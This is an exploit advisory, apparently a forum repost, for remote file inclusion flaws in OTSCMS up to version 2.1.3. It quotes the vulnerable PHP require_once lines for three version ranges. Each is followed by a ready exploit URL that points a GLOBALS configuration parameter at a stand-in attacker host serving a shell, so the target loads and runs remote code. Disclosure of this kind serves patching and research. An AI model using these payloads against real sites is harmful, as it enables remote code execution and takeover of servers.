OTSCMS <= 2.1.3 Multiple Remote File Include Vulnerabilities
[code]**********************************************************************************************************
* *
* Coding 4 Fun (c4f.pl) *
* *
*************************
* OTSCMS <= 2.1.3 by Wrzasq ([url]www.otscms.com[/url]) ;
* Class = Remote File Inclusion ;
* Download = [url]http://sourceforge.net/project/showfiles.php?group_id=145557[/url] ;
* Found by = GregStar (gregstar{at}c4f{dot}pl) ;
-------------------------------------------------------------------------------------------------------------------
OTSCMS 2.0.0 - 2.1.3 :
- Vulnerable Code:
require_once($GLOBALS['config']['directories']['classes'] . $class . '.php');
- Exploit:
http://[target]/[path]/OTSCMS.php?GLOBALS[config][directories][classes]=http://evilsite.com/shell?
-------------------------------------------------------------------------------------------------------------------
OTSCMS 1.3.0 - 1.4.1 :
- Vulnerable Code:
require_once($GLOBALS['config']['otscms']['directories']['classes'] . $class . '.php');
- Exploit:
http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][classes]=http://evilsite.com/shell?
-------------------------------------------------------------------------------------------------------------------
OTSCMS 1.0.0 - 1.0.3 :
- Vulnerable Code:
require_once($GLOBALS['config']['otscms']['directories']['includes'].'OTSCMSException.class.php');
- Exploit:
http://[target]/[path]/OTSCMS.php?GLOBALS[config][otscms][directories][includes]=http://evilsite.com/shell?
------------------------------------------------------------------------------------------------------------------
Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,RFL,d3m0n,java,kw@ch and for all friends.
**************************************************************************************************************
Notes:
Only works with php5 and 2.1.4 should also be vulnerable using OTSCMS.php with the config variable.
/str0ke
[/code]
页:
[1]